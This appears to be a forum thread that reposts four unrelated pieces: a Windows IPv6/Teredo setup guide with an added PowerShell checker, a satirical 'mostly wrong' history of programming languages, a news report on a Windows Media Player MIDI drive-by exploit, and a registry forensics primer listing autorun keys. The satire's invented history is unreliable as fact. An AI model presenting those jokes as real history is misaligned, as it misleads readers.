At its core, IPv6 is simply “more address space”. The “old way” of addressing, called IPv4, with its 32-bit address space, is running out of space to use, even with the use of NAT. Predictions claim we may run out of space as early as 2012, though I would not be surprised to see us “hang on” a little longer. IPv6 in contrast has a 128-bit address space, which is ridiculously huge. This has some implications:

- IPv6 will rely on DNS to an even greater degree than IPv4. Let me take the example of go6.net. Its IPv6 address is 2001:5c0:0:1::6. The ‘::’ is a way of saying “multiple zeros here” in IPv6, to shorten writing it. That’s actually a fairly neat and short address, but still hard to memorize. A less ‘neat’ address may look like 2001:470:1f06:223:bd6f:6f5c:a458:2802. Good luck memorizing that one. We’ll need names, and good reverse DNS, and good DDNS.
- Because we have so much address space now, IPv6 does away with IPv4-style subnetting. In IPv6, every subnet is a /64. That is 16 quintillion addresses, up from 4 billion in the entire IPv4 range. And that’s just for one subnet. The goal is to avoid the pain of different-sized subnets – needing to wrestle with /26, /28 and /29 – and the even greater pain of having to change subnets, say going from a /29 to a /28 because you ran out of space and have now a few machines more than you envisioned. The IPv6 /64 subnet range is envisioned to cover all devices that could possibly be hooked up to the physical medium that carries that subnet. “Leaf nodes” – that is, sites that aren’t large carrier-grade – will receive a /48, which can then be carved up into individual /64s. This will allow for 65,000+ subnets per site, which will be plenty even for large corporations. A /48 is also what you might receive at home, depending on how you connect to IPv6.
- Lots of address space also means we don’t need private addresses any more. This does away with NAT, which makes life hugely simpler for applications. VPNs become easier, and protocols that embed IP information – notoriously, all the VOIP stuff like H.323 and SIP, as well as Microsoft’s SMB file-sharing protocol – also benefit. As do P2P and game applications, BTW – no more need to configure “port forwards” for these. This also means that firewalling is a must. While NAT was never meant to be a security feature, PAT or Hide-NAT in particular, as implemented in home routers, was often touted as a “firewall” feature by vendors, because by its nature, it disallows incoming connections.

There are huge application-level challenges in interop, too, and I’ll get to those.

So, how does an IPv6 host talk to an IPv4 host, or vice versa? The answer is “with difficulty”, if at all. Proposals for rewriting addressing on-the-fly are technically brittle. Particularly when it comes to those applications mentioned that embed IP addresses, like H.323 and SIP and SMB, rewriting that data stream is not very feasible, and not at all scalable. The best idea proposed so far has been to “dual-stack” IPv6-capable equipment: Any given host would have both an IPv6 address and an IPv4 address. It will talk to IPv4 hosts using IPv4, and to IPv6 hosts using IPv6. That is a workable way around those application-level interop challenges. At some point, of course, one would have to either phase out IPv4 or bite the bullet and do application-layer translation for those clients that are still IPv4-only.

For DNS, what you need to know is: IPv4 records are A records, IPv6 records are AAAA records. Any given host can have one, the other, or both. go6.net has both, google.com has only IPv4, and IPv6-only hosts such as ipv6.google.com are extremely rare right now. Who in their right mind, after all, would limit content to a tiny portion of the Internet users?

Windows XP will always use IPv4 to query DNS servers. Even to get an AAAA record, the actual query will run over IPv4. Windows Vista can run IPv6-native and query DNS over IPv6. Both Windows XP and Windows Vista will advertise their IPv6 address as a DDNS update. If you run your own DNS server at home and it is IPv6-capable, it should pick up the addresses of your IPv6 hosts.

[h=2]Connecting to IPv6[/h]

Alright, so how do you connect to, say, a web server, using IPv6? Your home router does not know IPv6, and even if it does, your ISP’s router is most likely not configured for IPv6, and would not forward your IPv6 packets. Therefore, you have three ways to get to IPv6 hosts, two of which are actually going to be available for most people at this point.

1. Native IPv6. Your ISP supplies you with IPv6 address space and does all the hard work for you. Rejoice, you are done! Just that, as of this writing, unless you live in France or near one of these ISPs, you are pretty much out of luck. Comcast and other cable providers are starting to make noises about DOCSIS 3.0, which is IPv6-capable, but that is years out. [Edit] Or rather, was years out in 2008 – Comcast is now trialing ipv6 for consumers, with rollout planned in a 2011/2012 timeframe. If you have Verizon FiOS in your area, you’ll get DOCSIS 3.0 earlier – though not necessarily with IPv6 right away. If there’s no FiOS, don’t expect DOCSIS 3.0 very soon. We need other ways of connecting – of tunneling IPv6 traffic through an IPv4 network in some way shape or form.

2. Use a tunnel broker. This is actually going to be your best bet for connecting to IPv6, which is why, perversely, I’ll discuss it in more detail in a later post. Tunnel brokers available are SixXS, which supports both hardware (static) and software/client (heartbeat, AYIYA) tunnels and gives you a full /48; Hurricane Electric, which is more geared towards static (hardware) tunnels and gives you one /64 subnet now also offers a /48; Gogonet/Freenet6, who have their own proprietary way of traversing NAT and are really easy to set up; and Earthlink R&D, which is very specialized: You connect using a custom firmware for a Linksys WRT54G router, and get a /64. Earthlink would be a good choice if you wanted to run IPv6 on your home router, not your home PC, and you don’t have a Cisco / Juniper / what-have-you at home. I’d expect most people to go with Freenet6 or SixXS and use their software client. I’m set up with Hurricane right now, but for a client setup, I’d choose Freenet6. There’s also the Apple Airport Extreme, which handles IPv6 tunnels without exposing any of the nuts-and-bolts to the user. [Edit] D-Link have released a number of ipv6 capable routers, too, as have Linksys/Cisco.

3. Use Teredo, a Microsoft-supported tunnel that is established directly from your client machine. Teredo was meant to be used only by applications that specifically request it. For this reason, a host that has Teredo enabled would only ever use Teredo to connect to IPv6-only machines. If IPv4 is an option, it will always prefer that. So, why talk about it first? Because it ships with both Windows XP SP2 and Windows Vista/7 – enabled by default in the latter two, though not enabled for “general application use” by default – and we can expect it to be used to get to IPv6-only content, as tunnel brokers, on the outside, may seem like more work to set up. [Edit] And indeed, with the release of an ipv6 capable uTorrent and HE’s provisioning of Teredo relay servers, Teredo traffic has spiked sharply.

[h=2]Setting up Teredo[/h]

And here’s the breakdown of how to set up Teredo. Again, keep in mind, IPv4 will always be preferred. go6.net will show you with an IPv4 address if all you have is Teredo.

[h=3]Windows XP SP2[/h]

Realize that Teredo in Windows XP does not support Hide NAT, aka PAT, aka many-to-1 NAT, aka what your home router does. In Teredo language, that kind of NAT is called “Symmetric NAT”, and it’s just not supported by the Teredo implementation in XP. You can still experiment some by sticking a host onto the Internet directly, without a home router in between. If you have an additional public IP address, you could also set up a Static NAT (aka 1-to-1 NAT), which Teredo calls a “Cone NAT” (if you allow all incoming) or “Restricted Cone NAT” (if you disallow incoming connections), and which is supported. My experiments with my router’s “DMZ” setting, to see whether that will get around the issue, have been less than successful. While Teredo claimed I was behind “cone” NAT, I still had no connectivity.

1. Add the IPv6 protocol to your interface. Control Panel | Network Connections -> Right-Click “Properties” on your LAN or WiFi connection, “Install…”, “Protocol”, “Add…”, choose “Microsoft TCP/IP version 6”, hit “OK” until you’re out again. Open a command line – “cmd” from Start | Run – and run “ipconfig /all”. You should now see a “link local” IPv6 address, which looks something like “fe80::214:85ff:fe2f:8f06%4”. This won’t be useful for connecting to anything “out there”, but it’ll let you know IPv6 is up and running.

2. Configure Teredo. Assuming you are in the US, the command would be “netsh interface ipv6 set teredo client teredo.ipv6.microsoft.com”. If you are elsewhere in the world, you may be able to find a closer Teredo server. If you are on a Windows domain – as opposed to a home workgroup – Teredo will disable even if you configure it. You can get around that with the command “netsh interface ipv6 set teredo enterpriseclient”. The command to see the configured Teredo parameters is “netsh int ipv6 show teredo”, and the message indicating that a user is behind PAT and thus Teredo won’t work here is “Error : client behind symmetric NAT”.

3. Use an IPv6-only host to test connectivity. If you can connect to http://ipv6.google.com/, it’s working. Or you could “ping ipv6.google.com” from command line, which should show you an IPv6 address, and succeed.

A useful command to use while trying different configurations is “netsh int ipv6 renew”, which will re-negotiate the Teredo tunnel. “netsh int ipv6 show route” will show you ipv6 routes.

Keep in mind that Windows XP will always prefer IPv4 over IPv6 when Teredo is used for IPv6 connectivity. Unless a host has no IPv4 address, its IPv6 address will not be used.

Lastly, there are reports that Firefox 2 on Windows XP does not handle IPv6 well. Try Firefox 3, or Internet Explorer.

[h=3]Windows Vista[/h]

IPv6 and Teredo both are enabled by default in Windows Vista. Teredo also supports Hide-NAT aka PAT aka what your home router does. Woo, we’re done? Not so fast, young Anakin: In order to avoid IPv6 connectivity issues caused by default Teredo tunnels, Microsoft have configured DNS so that the system will never resolve any name to an IPv6 address, as long as the system only has link-local and Teredo IPv6 addresses. Teredo is meant to be used by applications that specifically request its use, and that does not include any browsers.

Thus, we need to hoodwink Vista. If the criterion is “has only link-local or Teredo addresses”, why, then we need to supply another address. Luckily, IPv6 maps the entire ipv4 address space, so we can use that. In reality, it doesn’t matter which address we configure, since it won’t ever be used anyway.

1. Open up the Properties of your LAN or WiFi interface, and change it to have a static IPv6 address. Use either the converted IPv4 address you figured out using the link I gave, or use the 192.168.1.2 equivalent of 2002:c0a8:102:: with a netmask of 48. Do not configure a default gateway for this address.

2. Vista would now resolve names to IPv6 addresses, but we need to force it to route traffic through our Teredo interface first. For this, you’ll need to run a Command prompt as “Administrator”. Create a shortcut to a Command prompt on your desktop, then right-click “run as administrator”. Figure out the ID of your “Teredo Tunneling Pseudo-Interface” using “route print” and looking at the “Interface List” at the top of its output. In my case, it is “14”. Then, using this ID, add a default route that forces all IPv6 traffic through Teredo:

netsh interface ipv6 add route ::/0 interface=14

3. Use an IPv6-only host to test connectivity. If you can connect to http://ipv6.google.com/, it’s working. Or you could “ping ipv6.google.com” from command line, which should show you an IPv6 address, and succeed.

Keep in mind that Windows Vista will always prefer IPv4 over IPv6 when Teredo is used for IPv6 connectivity. Unless a host has no IPv4 address, its IPv6 address will not be used.

[Edit 2010-02-24 - added Windows 7 and Troubleshooting sections]

[h=3]Windows 7[/h]

[this is the same procedure as for Vista, tested on Win7 x64]

[Edit 2010-04-09 - replaced kludgy workaround for disappearing default route with elegant workaround received through comment]

IPv6 and Teredo both are enabled by default in Windows 7, just as in Vista. Also as in Vista, Microsoft have configured DNS so that the system will never resolve any name to an IPv6 address, as long as the system only has link-local and Teredo IPv6 addresses.

Thus, we need to hoodwink Win7. As with Vista, we will provide a 6to4 address. Luckily, IPv6 maps the entire ipv4 address space, so we can use that. In reality, it doesn’t matter which address we configure, since it won’t ever be used anyway.

1. Open up the Properties of your LAN or WiFi interface, and change it to have a static IPv6 address. Use either the converted IPv4 address you figured out using the link I gave, or use the 192.168.1.2 equivalent of 2002:c0a8:102:: with a netmask of 48. Do not configure a default gateway for this address.

2. In order for Win7 to resolve names to IPv6 addresses, we need to force it to route traffic through our Teredo interface first. For this, you’ll need to run a Command prompt as “Administrator”. Create a shortcut to a Command prompt on your desktop, then right-click “run as administrator”. Figure out the ID of your “Teredo Tunneling Pseudo-Interface” using “route print” and looking at the “Interface List” at the top of its output. In my case, it is “14”. Then, using this ID, add a default route that forces all IPv6 traffic through Teredo:

netsh interface ipv6 add route ::/0 interface=14

3. Use an IPv6-only host to test connectivity. Try to ping ipv6.google.com or connect to http://ipv6.google.com/.

Keep in mind that Win7 will always prefer IPv4 over IPv6 when Teredo is used for IPv6 connectivity. Unless a host has no IPv4 address, its IPv6 address will not be used.

In my testing, Win7 would deactivate the default ipv6 route when there was no ipv6 traffic. Thanks to Sam Karim, I can present a fix for this issue: Configure Teredo to be “Default Qualified” so it will not enter into “Dormant” state.

On Windows 7 Business and better:

1. Run “gpedit.msc” from the Start Menu by typing it into the search bar or “Run” bar.
2. Navigate to Computer Configuration -> Administrative Templates -> Network -> TCPIP Settings -> IPv6 Transition Technologies.
3. Double click the “Teredo Default Qualified” setting, change it from “Not Configured” to “Enabled”, and click OK, then close gpedit.msc. The setting should take effect rather quickly, but you can do “gpupdate /force” to force a refresh.

On Windows 7 Home Premium and Starter editions, you will need to manually create a registry key:

1. Open regedit from the Start Menu by typing it into the search bar or “Run” bar.
2. Navigate to HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows.
3. Right-click the “Windows” Key and choose New -> Key, create a “TCPIP” Key (observe case).
4. Right-click the “TCPIP” Key and choose New -> Key, create a “v6Transition” Key (observe case).
5. Right-click the “v6Transition” Key and choose New -> String Value, create an entry called “Teredo_DefaultQualified” with a value of “Enabled” (observe case, note the underscore).

Old workaround for reference until I have fully tested the above new-and-improved methods:

1. Create a text file, name it “fix-ipv6.cmd” (make sure you can see file extensions!) and paste these lines into it:

```
REM Because Win7 gets rid of ipv6 routes
netsh interface ipv6 delete route ::/0 interface=14
netsh interface ipv6 add route ::/0 interface=14
REM Optionally, run a continuous ping here instead of through a task
REM ping -t ipv6.google.com
```

2. Change the ID of the interface in this text file to the ID of the Teredo interface on your system.

3. Create a task to run a continuous ping. Optionally, just un-comment the ping command in the file you just created.
- Control Panel | System and Security | Schedule tasks
- Create task (on the right)
- General pane: Give it a name, “Run whether user is logged on or not”, “Configure for: Windows 7”
- Triggers: “New”, “At Startup”, hit “OK”
- Actions: “New”, “Start a program”, enter “ping” into “Program/script” and “ipv6.google.com -t” into “Add arguments (optional)”
- Conditions: Uncheck “Start the task only if the computer is on AC power”
- Settings: Check “Run task as soon as possible after a scheduled start is missed”, “If the task fails, restart every” and uncheck “Stop the task if it runs longer than”

4. After reboot, you’ll need to right-click your “fix-ipv6” and “Run as administrator”.

In my testing, this workaround kept the ::/0 route active. You can check using “route print -6” – you want to see the ::/0 route in both active and persistent routes. When it is inactive, it shows up only in persistent.

If this all sounds like more trouble than it’s worth, then using a tunnel broker as described in part 3 may be the ticket for you.

[h=3]Google and v6[/h]

You can add a Google-v6-savvy DNS server, such as HE’s 2001:470:20::2, to your LAN or WiFi connection, and this will give you both ipv4 and ipv6 addresses for Google. However, as Windows will always prefer ipv4 if all you have is Teredo, ipv6 won’t be used in that case. If you’d like to use ipv6 for Google/Youtube, take a look at part 3 of this series instead, and go with a tunnel broker.

[h=3]Troubleshooting[/h]

Test ipv6 DNS lookup from command line. Note the ping fails to resolve the name, but nslookup can resolve it. This means our DNS server has the entry, but we haven’t configured Win7 yet to use v6 addresses.

```
>ping ipv6.google.com
Ping request could not find host ipv6.google.com. Please check the name and try again.

>nslookup ipv6.google.com
Non-authoritative answer:
Name:    ipv6.l.google.com
Addresses:  2001:4860:b009::93
            2001:4860:b009::63
            2001:4860:b009::67
            2001:4860:b009::69
            2001:4860:b009::68
            2001:4860:b009::6a
Aliases:  ipv6.google.com
```

Check that the ::/0 route has been added correctly. Open netsh, navigate to interface ipv6, and enter show route. This is what you want to see:

```
netsh interface ipv6>show route

Publish  Type      Met  Prefix                    Idx  Gateway/Interface Name
-------  --------  ---  ------------------------  ---  ------------------------
No       Manual    256  ::/0                       14  Local Area Connection* 9
```

On my system, after changing the IPv6 address of the LAN interface, that route goes into “limbo”. Meaning show route does not show it, but route print does. In that case, you can delete and re-create it, again from netsh’s interface ipv6 context:

```
delete route ::/0 "Local Area Connection* 9"
add route ::/0 "Local Area Connection* 9"
```

show teredo is useful to see whether Teredo connectivity is there. You want to see your state as “qualified”:

```
netsh interface ipv6>show teredo
Teredo Parameters
---------------------------------------------
Type                    : client
Server Name             : teredo.ipv6.microsoft.com.
Client Refresh Interval : 30 seconds
Client Port             : unspecified
State                   : qualified
Client Type             : teredo client
Network                 : unmanaged
NAT                     : symmetric (port)
NAT Special Behaviour   : UPNP: No, PortPreserving: No
Local Mapping           : -
External NAT Mapping    : -
```

In order for DNS to resolve IPv6 addresses, the LAN/WiFi interface must have a 6to4 address without a default route, Teredo must be working, and a default route through Teredo must be configured. Miss one of those three, and you won’t be able to resolve ipv6 DNS.

Sursa: IPv6 at home, Part 1: Overview, Teredo
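The three conditions the post closes with (a 6to4 address on the LAN interface, Teredo in the qualified state, a ::/0 route through the Teredo interface) can be checked in one go from the same netsh output the Troubleshooting section shows. The script below is an added example, not part of the original post: it parses that output, assumes the Windows 7 column layout of "netsh interface ipv6 show interface" (Idx, Met, MTU, State, Name), and includes a helper that derives the 2002: prefix from an IPv4 address the way the post does for 192.168.1.2.

```powershell
# Added example (not from the original post). Runs on Windows 7 PowerShell 2.0
# or later; parses plain netsh text, so it relies on the English output format.

function ConvertTo-6to4Prefix {
    # Derive the 6to4 prefix 2002:WWXX:YYZZ:: from a dotted-quad IPv4 address.
    # Hextets are written without leading zeros, as the post writes 2002:c0a8:102::
    param([Parameter(Mandatory = $true)][string]$IPv4)
    $o = @($IPv4.Split('.') | ForEach-Object { [int]$_ })
    if ($o.Count -ne 4) { throw "Not a dotted-quad IPv4 address: $IPv4" }
    $hi = '{0:x}' -f ($o[0] * 256 + $o[1])   # first two octets  -> WWXX
    $lo = '{0:x}' -f ($o[2] * 256 + $o[3])   # last two octets   -> YYZZ
    return "2002:${hi}:${lo}::"               # 192.168.1.2 -> 2002:c0a8:102::
}

function Test-TeredoPrerequisites {
    # Capture the same netsh views the post's Troubleshooting section uses.
    $teredo = netsh interface ipv6 show teredo
    $ifaces = netsh interface ipv6 show interface
    $routes = netsh interface ipv6 show route
    $addrs  = netsh interface ipv6 show address

    # 1. Teredo has qualified against its server ("State : qualified")
    $qualified = [bool]($teredo | Where-Object { $_ -match '^\s*State\s*:\s*qualified' })

    # 2. Index of the "Teredo Tunneling Pseudo-Interface"; assumes the
    #    "Idx  Met  MTU  State  Name" layout of show interface on Windows 7
    $teredoIdx = $null
    foreach ($line in $ifaces) {
        if ($line -match '^\s*(\d+)\s+\d+\s+\d+\s+\S+\s+.*Teredo') { $teredoIdx = $matches[1] }
    }

    # 3. A ::/0 route whose Idx column is that interface (the post's "No Manual 256 ::/0 14 ..." line)
    $defaultViaTeredo = $false
    if ($teredoIdx) {
        $defaultViaTeredo = [bool]($routes | Where-Object { $_ -match "\s::/0\s+$teredoIdx\s" })
    }

    # 4. A 6to4 address (2002::/16) on some interface, so the resolver returns AAAA records
    $has6to4 = [bool]($addrs | Where-Object { $_ -match '2002:[0-9a-f]{1,4}:[0-9a-f]{1,4}:' })

    New-Object PSObject -Property @{
        TeredoQualified       = $qualified
        TeredoInterfaceIdx    = $teredoIdx
        DefaultRouteViaTeredo = $defaultViaTeredo
        Has6to4Address        = $has6to4
        AllPrerequisitesMet   = ($qualified -and $defaultViaTeredo -and $has6to4)
    }
}

# Usage: the prefix for the post's example address, then the three checks.
ConvertTo-6to4Prefix -IPv4 192.168.1.2
Test-TeredoPrerequisites | Format-List
```

If AllPrerequisitesMet is false, the individual fields say which of the three steps to revisit; the check is read-only and changes no route or setting.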
-
[h=3]A Brief, Incomplete, and Mostly Wrong History of Programming Languages[/h][h=2]Thursday, May 7, 2009[/h] 1801 - Joseph Marie Jacquard uses punch cards to instruct a loom to weave "hello, world" into a tapestry. Redditers of the time are not impressed due to the lack of tail call recursion, concurrency, or proper capitalization. 1842 - Ada Lovelace writes the first program. She is hampered in her efforts by the minor inconvenience that she doesn't have any actual computers to run her code. Enterprise architects will later relearn her techniques in order to program in UML. 1936 - Alan Turing invents every programming language that will ever be but is shanghaied by British Intelligence to be 007 before he can patent them. 1936 - Alonzo Church also invents every language that will ever be but does it better. His lambda calculus is ignored because it is insufficiently C-like. This criticism occurs in spite of the fact that C has not yet been invented. 1940s - Various "computers" are "programmed" using direct wiring and switches. Engineers do this in order to avoid the tabs vs spaces debate. 1957 - John Backus and IBM create FORTRAN. There's nothing funny about IBM or FORTRAN. It is a syntax error to write FORTRAN while not wearing a blue tie. 1958 - John McCarthy and Paul Graham invent LISP. Due to high costs caused by a post-war depletion of the strategic parentheses reserve LISP never becomes popular[1]. In spite of its lack of popularity, LISP (now "Lisp" or sometimes "Arc") remains an influential language in "key algorithmic techniques such as recursion and condescension"[2]. 1959 - After losing a bet with L. Ron Hubbard, Grace Hopper and several other sadists invent the Capitalization Of Boilerplate Oriented Language (COBOL) . Years later, in a misguided and sexist retaliation against Adm. Hopper's COBOL work, Ruby conferences frequently feature misogynistic material. 
1964 - John Kemeny and Thomas Kurtz create BASIC, an unstructured programming language for non-computer scientists.

1965 - Kemeny and Kurtz go to 1964.

1970 - Guy Steele and Gerald Sussman create Scheme. Their work leads to a series of "Lambda the Ultimate" papers culminating in "Lambda the Ultimate Kitchen Utensil." This paper becomes the basis for a long running, but ultimately unsuccessful run of late night infomercials. Lambdas are relegated to relative obscurity until Java makes them popular by not having them.

1970 - Niklaus Wirth creates Pascal, a procedural language. Critics immediately denounce Pascal because it uses "x := x + y" syntax instead of the more familiar C-like "x = x + y". This criticism happens in spite of the fact that C has not yet been invented.

1972 - Dennis Ritchie invents a powerful gun that shoots both forward and backward simultaneously. Not satisfied with the number of deaths and permanent maimings from that invention he invents C and Unix.

1972 - Alain Colmerauer designs the logic language Prolog. His goal is to create a language with the intelligence of a two year old. He proves he has reached his goal by showing a Prolog session that says "No." to every query.

1973 - Robin Milner creates ML, a language based on the M&M type theory. ML begets SML which has a formally specified semantics. When asked for a formal semantics of the formal semantics Milner's head explodes. Other well known languages in the ML family include OCaml, F#, and Visual Basic.

1980 - Alan Kay creates Smalltalk and invents the term "object oriented." When asked what that means he replies, "Smalltalk programs are just objects." When asked what objects are made of he replies, "objects." When asked again he says "look, it's all objects all the way down. Until you reach turtles."

1983 - In honor of Ada Lovelace's ability to create programs that never ran, Jean Ichbiah and the US Department of Defense create the Ada programming language. In spite of the lack of evidence that any significant Ada program is ever completed, historians believe Ada to be a successful public works project that keeps several thousand roving defense contractors out of gangs.

1983 - Bjarne Stroustrup bolts everything he's ever heard of onto C to create C++. The resulting language is so complex that programs must be sent to the future to be compiled by the Skynet artificial intelligence. Build times suffer. Skynet's motives for performing the service remain unclear but spokespeople from the future say "there is nothing to be concerned about, baby," in an Austrian-accented monotone. There is some speculation that Skynet is nothing more than a pretentious buffer overrun.

1986 - Brad Cox and Tom Love create Objective-C, announcing "this language has all the memory safety of C combined with all the blazing speed of Smalltalk." Modern historians suspect the two were dyslexic.

1987 - Larry Wall falls asleep and hits Larry Wall's forehead on the keyboard. Upon waking Larry Wall decides that the string of characters on Larry Wall's monitor isn't random but an example program in a programming language that God wants His prophet, Larry Wall, to design. Perl is born.

1990 - A committee formed by Simon Peyton-Jones, Paul Hudak, Philip Wadler, Ashton Kutcher, and People for the Ethical Treatment of Animals creates Haskell, a pure, non-strict, functional language. Haskell gets some resistance due to the complexity of using monads to control side effects. Wadler tries to appease critics by explaining that "a monad is a monoid in the category of endofunctors, what's the problem?"

1991 - Dutch programmer Guido van Rossum travels to Argentina for a mysterious operation. He returns with a large cranial scar, invents Python, is declared Dictator for Life by legions of followers, and announces to the world that "There Is Only One Way to Do It." Poland becomes nervous.

1995 - At a neighborhood Italian restaurant Rasmus Lerdorf realizes that his plate of spaghetti is an excellent model for understanding the World Wide Web and that web applications should mimic their medium. On the back of his napkin he designs Programmable Hyperlinked Pasta (PHP). PHP documentation remains on that napkin to this day.

1995 - Yukihiro "Mad Matz" Matsumoto creates Ruby to avert some vaguely unspecified apocalypse that will leave Australia a desert run by mohawked warriors and Tina Turner. The language is later renamed Ruby on Rails by its real inventor, David Heinemeier Hansson. [The bit about Matsumoto inventing a language called Ruby never happened and better be removed in the next revision of this article - DHH].

1995 - Brendan Eich reads up on every mistake ever made in designing a programming language, invents a few more, and creates LiveScript. Later, in an effort to cash in on the popularity of Java the language is renamed JavaScript. Later still, in an effort to cash in on the popularity of skin diseases the language is renamed ECMAScript.

1996 - James Gosling invents Java. Java is a relatively verbose, garbage collected, class based, statically typed, single dispatch, object oriented language with single implementation inheritance and multiple interface inheritance. Sun loudly heralds Java's novelty.

2001 - Anders Hejlsberg invents C#. C# is a relatively verbose, garbage collected, class based, statically typed, single dispatch, object oriented language with single implementation inheritance and multiple interface inheritance. Microsoft loudly heralds C#'s novelty.

2003 - A drunken Martin Odersky sees a Reese's Peanut Butter Cup ad featuring somebody's peanut butter getting on somebody else's chocolate and has an idea. He creates Scala, a language that unifies constructs from both object oriented and functional languages. This pisses off both groups and each promptly declares jihad.
[h=4]Footnotes[/h]
Fortunately for computer science the supply of curly braces and angle brackets remains high.
Catch as catch can - Verity Stob

Source: One Div Zero: A Brief, Incomplete, and Mostly Wrong History of Programming Languages
-
[h=1]Drive-by-download Attack Exploits Critical Vulnerability in Windows Media Player[/h]
By Lucian Constantin, IDG News
Jan 27, 2012 12:01 pm

Security researchers from antivirus vendor Trend Micro have come across a Web-based attack that exploits a known vulnerability in Windows Media Player.

"Earlier today, we encountered a malware that exploits a recently (and publicly) disclosed vulnerability, the MIDI Remote Code Execution Vulnerability (CVE-2012-0003)," Trend Micro threat response engineer Roland Dela Paz said in a blog post on Thursday.

The security flaw can be exploited by tricking the victim into opening a specially crafted MIDI (Musical Instrument Digital Interface) file in Windows Media Player. Microsoft released a security fix for it on January 10, as part of its monthly patch cycle. "An attacker who successfully exploited this vulnerability could take complete control of an affected system," the company said at the time.

The so-called drive-by-download attack identified by Trend Micro researchers uses a malicious HTML page to load the malformed MIDI file as an embedded object for the Windows Media Player browser plug-in. If successful, the exploit downloads and executes a computer Trojan on the targeted system, which Trend Micro detects as TROJ_DLOAD.QYUA.

"We're still conducting further analysis on TROJ_DLOAD.QYUA, but so far we've been seeing some serious payload, including rootkit capabilities," Dela Paz said.

It's not yet clear how victims are being tricked into visiting the malicious page, but the attack doesn't appear to target a particular organization or group of people, said David Sancho, a senior antivirus researcher at Trend Micro.

According to the researcher, the attack is not widespread at the moment, but it is possible that other attackers will start exploiting the same vulnerability in the near future. "As mentioned, this is a publicly disclosed vulnerability so we can expect similar attacks in the future," Sancho said.

Trend Micro advises users to install the security patches described by Microsoft in its MS12-004 security bulletin. The vulnerability affects Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008, but not Windows 7 or Windows Server 2008 R2.

As a general rule, users should always keep their operating systems and other software installed on their computers up to date in order to avoid becoming victims of drive-by-download attacks. Running an antivirus program capable of scanning Web content at all times is also recommended.

Source: Drive-by-download Attack Exploits Critical Vulnerability in Windows Media Player | PCWorld
-
[h=4]Windows Registry Forensics[/h][h=3]Thursday, January 26, 2012[/h]
Document created by Yakov Goldberg, UBERsec team
Our website: UBERsec - When efficiency & smart cyber security collaborates together.
Follow us on Twitter.

Windows Registry Forensics

BACKGROUND

Most Windows operating systems (OS) contain a database called the Windows registry. The Windows registry consists of data files that hold essential information about the OS, the software applications installed in Windows, hardware information and various system components. The registry is organised into folders called keys, which hold values that contain specific information about the key they belong to. By browsing through the keys and reading the values, users can find information about applications that have been installed on the system, files that were used recently, and applications and services that are run during the Windows start-up process.

The information in this article presents some interesting locations within the Windows registry. That information can be viewed by all users and helps them to learn and understand the registry and to realise what Windows logs inside it. Likewise, the information in this article can help users to perform some simple forensic analysis of their Windows registry for learning purposes or for troubleshooting as needed.

THE REGISTRY HIVES

To load the Windows registry editor, click on the START button, then click on RUN, and then type regedt32.

You should now see the registry editor with its five root hives (screenshot omitted). Keep in mind, however, that Windows Vista and Windows 7 also include additional registry hive files besides those that are loaded by the registry editor.
- HKEY_CLASSES_ROOT (HKCR): this hive contains configuration information that specifies which applications are used to open each file format on the system.

- HKEY_CURRENT_USER (HKCU): this hive contains information about the user who is currently logged on to the system and about that user's profile. The HKCU tree corresponds to the NTUSER.dat file, located in the following location on your hard drive:
For Windows XP users: C:\Documents and Settings\username\NTUSER.dat
For Windows Vista and 7 users: C:\Users\username\NTUSER.dat

Note that there are open-source tools on the Internet that let you view the information within an NTUSER.dat file without having to log on as each user and then access that registry hive. However, if you are a professional forensics analyst, logging on to an OS that is used as evidence in a criminal investigation under the suspect's Windows profile, merely to collect registry artifacts pertaining to the crime, is NOT a good idea: you will contaminate the timelines stored within the NTUSER.dat file (HKCU) and the evidence will not be admissible in court. The information within NTUSER.dat must only be viewed by booting an external OS (such as Linux) from a CD or USB stick, mounting the local drive and then viewing the information in each file. The BackTrack distribution contains some great tools that can help with this task. In addition, you may choose to download a demo of AccessData Registry Viewer, and/or purchase that application, to help you collect information from other users' NTUSER.dat files without having to worry about contaminating the integrity of the evidence.

- HKEY_LOCAL_MACHINE (HKLM): this hive contains by far the most information about the OS configuration state and about the hardware and software settings.
Upon expanding the HKLM tree, you should see its sub-keys (screenshot omitted). These keys correspond to hive files located in the following location on your hard drive:
%WINDIR%\system32\config

Note that there are open-source tools on the Internet that let you view the information within each file without having to use the registry editor. However, since these files are locked by the OS once it is loaded, the information within each file can only be viewed by booting an external OS (such as Linux) from a CD or USB stick, mounting the local drive and then viewing the information in each file. The BackTrack distribution contains some great tools that can help with this task.

- HKEY_USERS (HKU): this hive contains the settings of every user who has logged on to the system. In addition, it contains the default profile configuration used for new user profiles.

- HKEY_CURRENT_CONFIG (HKCC): this hive contains information about the hardware profile the OS uses during start-up.

WARNING

Before attempting to view the registry or change any values in any of the hives, it is a good idea to back up the registry to your local drive. Often people change keys and values within the registry and, as a result, their OS crashes, Windows fails to boot, and so on. To back up the registry to a file, use the Export option in the File menu of the registry editor and save the file to the root of your local C: drive. If, after making changes to the registry, you realise that you need to restore it to the state it was in before, you can always import that file back into your registry.

INSTRUCTIONS

First let's start with keys and values that exist under HKEY_LOCAL_MACHINE (HKLM).
Listing applications that are launched during the OS boot process:
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
this location in HKLM,
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
and this location in HKCU,
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\

The following location lists all the services that are loaded by the Windows OS:
HKLM\System\CurrentControlSet\Services

Alternatively, to see all services without using the registry, click on the START button, then click on RUN, and then type services.msc (screenshot omitted).

Under the Services key you should see a sub-key for each service installed on the system. Upon clicking on the desired key, you should see the values pertaining to it in the right pane of the registry editor. One of these values is Start. If Start is set to 2, the service starts automatically when the Windows OS boots.

In the following location you can find the computer's name:
HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName

In the following location you will find the OS Product ID, Product Name, System Root, etc.:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion

In the following location you can find the time and date at which the OS was last shut down:
HKLM\System\CurrentControlSet\Control\Windows

After clicking on the Windows key, you should see the value ShutdownTime in the right pane. However, you cannot read this information unless you know how to convert the REG_BINARY value (a 64-bit FILETIME) into a readable date. Alternatively, you can download the LastShutDown.vbs script below and run it on the system.
root@ubersec$ sudo wget http://www.ubersec.com/downloads/LastShutDown.vbs
The results should look like the following (screenshot omitted).

In the following location you can find information about the system, such as the BIOS and product information.
The information includes the BIOS version and release date.
HKLM\HARDWARE\DESCRIPTION\System\BIOS

